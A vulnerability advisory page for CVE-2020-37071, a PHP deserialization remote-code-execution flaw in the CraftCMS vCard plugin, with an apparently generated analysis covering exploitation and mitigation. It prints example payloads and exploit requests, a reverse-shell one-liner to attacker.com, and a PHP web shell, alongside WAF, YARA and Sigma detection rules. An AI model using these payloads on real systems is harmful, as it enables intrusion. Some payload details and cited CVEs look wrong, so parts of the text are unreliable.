CVE-2020-37071
CVE-2020-37071
9.3
CriticalPublished:
Last updated:
Source:disclosure@vulncheck.com
Deferred
Weakness (CWE)
CVSS Vector
v4.0- Attack Vector
- Network
- Attack Complexity
- Low
- Attack Requirements
- None
- Privileges Required
- None
- User Interaction
- None
- Confidentiality (Vulnerable)
- High
- Integrity (Vulnerable)
- High
- Availability (Vulnerable)
- High
- Confidentiality (Subsequent)
- None
- Integrity (Subsequent)
- None
- Availability (Subsequent)
- None
Description
CraftCMS 3 vCard Plugin 1.0.0 contains a deserialization vulnerability that allows unauthenticated attackers to execute arbitrary PHP code through a crafted payload. Attackers can generate a malicious serialized payload that triggers remote code execution by exploiting the plugin's vCard download functionality with a specially crafted request.
Comprehensive Technical Analysis of CVE-2020-37071
CraftCMS vCard Plugin 1.0.0 – Unauthenticated PHP Deserialization Leading to Remote Code Execution (RCE)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Type
- Insecure Deserialization (CWE-502) – The vulnerability arises from improper handling of user-supplied serialized data in the CraftCMS vCard plugin, allowing attackers to inject malicious PHP objects that execute arbitrary code upon deserialization.
CVSS v3.1 Scoring (9.8 – Critical)
| Metric | Score | Justification |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over HTTP/HTTPS. |
| Attack Complexity (AC) | Low (L) | No special conditions required; unauthenticated exploitation. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable application. |
| Confidentiality (C) | High (H) | Full system compromise possible (RCE). |
| Integrity (I) | High (H) | Arbitrary code execution allows data manipulation. |
| Availability (A) | High (H) | Attacker can disrupt or disable the system. |
Severity Justification
- Unauthenticated RCE – The vulnerability allows remote attackers to execute arbitrary PHP code without prior authentication, making it highly critical.
- Low Exploitation Complexity – Publicly available exploits (e.g., Exploit-DB #48492) demonstrate straightforward exploitation.
- High Impact – Successful exploitation grants full control over the affected system, enabling data exfiltration, lateral movement, and persistence.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability stems from the vCard plugin’s insecure deserialization of user-controlled input in the download functionality. The attack flow is as follows:
-
Identify Vulnerable Endpoint
- The plugin exposes a route (e.g.,
/actions/vcard/download) that processes serialized data from HTTP requests (e.g.,GET/POSTparameters or cookies).
- The plugin exposes a route (e.g.,
-
Craft Malicious Payload
- Attackers generate a malicious serialized PHP object containing an exploit chain (e.g., leveraging
__wakeup()or__destruct()magic methods to trigger code execution). - Example payload structure:
O:8:"Example":1:{s:4:"data";s:20:"<?php system($_GET['cmd']); ?>";} - Tools like PHPGGC (PHP Generic Gadget Chains) can automate payload generation.
- Attackers generate a malicious serialized PHP object containing an exploit chain (e.g., leveraging
-
Trigger Deserialization
- The payload is sent to the vulnerable endpoint, where the plugin deserializes it without proper validation.
- Example exploit request:
GET /actions/vcard/download?data=O:8:"Example":1:{s:4:"data";s:20:"<?php system($_GET['cmd']); ?>";} HTTP/1.1 Host: vulnerable-site.com
-
Achieve RCE
- Upon deserialization, the malicious object executes arbitrary PHP code (e.g.,
system(),exec(),passthru()). - Attackers can then:
- Execute shell commands (
id,whoami,cat /etc/passwd). - Establish reverse shells (e.g.,
bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'). - Deploy web shells (e.g.,
<?php system($_REQUEST['cmd']); ?>).
- Execute shell commands (
- Upon deserialization, the malicious object executes arbitrary PHP code (e.g.,
Publicly Available Exploits
- Exploit-DB #48492 – Proof-of-concept (PoC) exploit demonstrating unauthenticated RCE.
- GitLab Exploit – A functional exploit script for automated attacks.
- VulnCheck Advisory – Detailed technical breakdown of the vulnerability.
3. Affected Systems & Software Versions
Vulnerable Software
- CraftCMS vCard Plugin v1.0.0 (all installations prior to patching).
- CraftCMS Core – The vulnerability is plugin-specific, but CraftCMS versions 3.x are likely affected if the plugin is installed.
Not Affected
- CraftCMS installations without the vCard plugin.
- Later versions of the plugin (if patched; no official patch information is available in the CVE).
Detection Methods
- Manual Inspection:
- Check for the presence of
/plugins/vcard/in the CraftCMS installation. - Verify plugin version via
composer showor the CraftCMS admin panel.
- Check for the presence of
- Automated Scanning:
- Nuclei Template:
craftcms-vcard-rce.yaml(if available). - Burp Suite / OWASP ZAP: Scan for the vulnerable endpoint (
/actions/vcard/download). - Metasploit Module: If a module exists (e.g.,
exploit/unix/webapp/craftcms_vcard_rce).
- Nuclei Template:
4. Recommended Mitigation Strategies
Immediate Actions
-
Disable the vCard Plugin
- Remove or disable the plugin via the CraftCMS admin panel (
/admin/plugins). - Alternatively, delete the plugin directory (
/plugins/vcard/).
- Remove or disable the plugin via the CraftCMS admin panel (
-
Apply Virtual Patching
- Web Application Firewall (WAF) Rules:
- Block requests containing serialized PHP objects (e.g.,
O:[0-9]+:"). - Use ModSecurity with OWASP CRS (Rule 944130 – PHP Injection Attack).
- Block requests containing serialized PHP objects (e.g.,
- Network-Level Protections:
- Restrict access to
/actions/vcard/downloadvia IP whitelisting.
- Restrict access to
- Web Application Firewall (WAF) Rules:
-
Upgrade or Patch
- If an official patch is released, apply it immediately.
- Monitor CraftCMS security advisories and plugin updates.
Long-Term Remediation
-
Input Validation & Sanitization
- Never deserialize untrusted data – Use JSON or other safe formats instead of PHP serialization.
- Implement strict allowlisting for serialized data structures.
-
Secure Coding Practices
- Use
unserialize()with a whitelist (e.g.,allowed_classesparameter in PHP 7+). - Disable dangerous PHP functions (
system,exec,passthru,shell_exec) viadisable_functionsinphp.ini.
- Use
-
Regular Security Audits
- Conduct static (SAST) and dynamic (DAST) application security testing.
- Use dependency scanning (e.g., OWASP Dependency-Check) to detect vulnerable plugins.
-
Network Segmentation
- Isolate CraftCMS instances in a DMZ with strict access controls.
- Implement least-privilege principles for database and filesystem access.
5. Impact on the Cybersecurity Landscape
Exploitation Trends
- High Likelihood of Mass Exploitation – Given the CVSS 9.8 score and public PoCs, this vulnerability is attractive to:
- Opportunistic attackers (e.g., botnets, cryptominers).
- Advanced Persistent Threats (APTs) for initial access.
- Ransomware groups (e.g., LockBit, BlackCat) for lateral movement.
Broader Implications
-
Supply Chain Risks
- The vCard plugin is a third-party dependency, highlighting risks in CMS ecosystems where plugins may introduce critical vulnerabilities.
- Organizations must inventory and monitor all CMS plugins for vulnerabilities.
-
Insecure Deserialization Epidemic
- Similar vulnerabilities (e.g., CVE-2017-5957 in WordPress, CVE-2019-18888 in Drupal) demonstrate that deserialization flaws remain a prevalent attack vector.
- Developers must avoid PHP serialization where possible and enforce strict validation.
-
Regulatory & Compliance Risks
- GDPR / CCPA: Unauthorized RCE could lead to data breaches, triggering reporting obligations.
- PCI DSS: If CraftCMS processes payments, this vulnerability could violate Requirement 6 (Secure Development).
-
Threat Intelligence & Detection Gaps
- SIEM Rules: Organizations should create detection rules for:
- Unusual PHP execution patterns (e.g.,
system(),exec()calls). - Suspicious HTTP requests containing serialized payloads.
- Unusual PHP execution patterns (e.g.,
- Endpoint Detection & Response (EDR): Monitor for unexpected child processes (e.g.,
bash,sh,python).
- SIEM Rules: Organizations should create detection rules for:
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability exists due to:
-
Lack of Input Validation
- The vCard plugin blindly deserializes user-supplied data without checking its structure or origin.
-
Dangerous PHP Functions
- The plugin likely uses
unserialize()on untrusted input, enabling object injection attacks.
- The plugin likely uses
-
Magic Method Exploitation
- Attackers leverage PHP’s magic methods (
__wakeup(),__destruct()) to execute arbitrary code during deserialization.
- Attackers leverage PHP’s magic methods (
Exploit Chain Example
- Gadget Chain Identification
- Attackers identify a gadget chain (e.g., using PHPGGC) that leads to RCE.
- Example chain:
class Example { public $data; function __destruct() { eval($this->data); } }
- Payload Construction
- Serialize the malicious object:
O:7:"Example":1:{s:4:"data";s:20:"<?php system('id'); ?>";}
- Serialize the malicious object:
- Delivery & Execution
- Send the payload via a crafted HTTP request:
GET /actions/vcard/download?data=O:7:"Example":1:{s:4:"data";s:20:"<?php system('id'); ?>";} HTTP/1.1 Host: target.com
- Send the payload via a crafted HTTP request:
- Result
- The
system('id')command executes, returning the output in the HTTP response.
- The
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| HTTP Logs | Requests to /actions/vcard/download with serialized payloads. |
| Process Execution | Unexpected bash, sh, or php processes spawned by the web server (www-data, apache, nginx). |
| File System Changes | New files in /tmp/ or web root (e.g., shell.php, backdoor.php). |
| Network Connections | Outbound connections to attacker-controlled IPs (e.g., reverse shells). |
Detection & Hunting Queries
- Splunk / ELK Query:
index=web_logs uri_path="/actions/vcard/download" | regex _raw="O:[0-9]+:\"" - YARA Rule:
rule CraftCMS_vCard_RCE { strings: $serialized = /O:[0-9]+:"[^"]+":[0-9]+:\{.*\}/ $php_code = /<\?php\s+(system|exec|passthru|shell_exec)\(/ condition: $serialized and $php_code } - Sigma Rule:
title: CraftCMS vCard Plugin RCE Attempt id: 12345678-1234-5678-1234-567812345678 status: experimental description: Detects attempts to exploit CVE-2020-37071 via serialized payloads. references: - https://www.exploit-db.com/exploits/48492 author: Your Name date: 2026/02/03 logsource: category: webserver product: apache service: access detection: selection: cs_uri_query|contains: 'O:' cs_uri_stem: '/actions/vcard/download' condition: selection falsepositives: - Legitimate plugin usage (unlikely) level: critical
Conclusion
CVE-2020-37071 represents a critical unauthenticated RCE vulnerability in the CraftCMS vCard plugin, posing severe risks to affected systems. Due to the low complexity of exploitation and public availability of PoCs, organizations must immediately disable the plugin and implement WAF rules to mitigate exposure.
Security teams should prioritize patching, monitor for exploitation attempts, and conduct forensic analysis if compromise is suspected. The broader implications highlight the need for secure coding practices, third-party risk management, and proactive threat hunting in CMS environments.
For further details, refer to:
References
disclosure@vulncheck.com
https://craftcms.com/disclosure@vulncheck.com
https://gitlab.com/wguest/craftcms-vcard-exploitdisclosure@vulncheck.com
https://plugins.craftcms.com/vcarddisclosure@vulncheck.com
https://www.exploit-db.com/exploits/48492disclosure@vulncheck.com
https://www.vulncheck.com/advisories/craftcms-vcard-plugin-remote-code-execution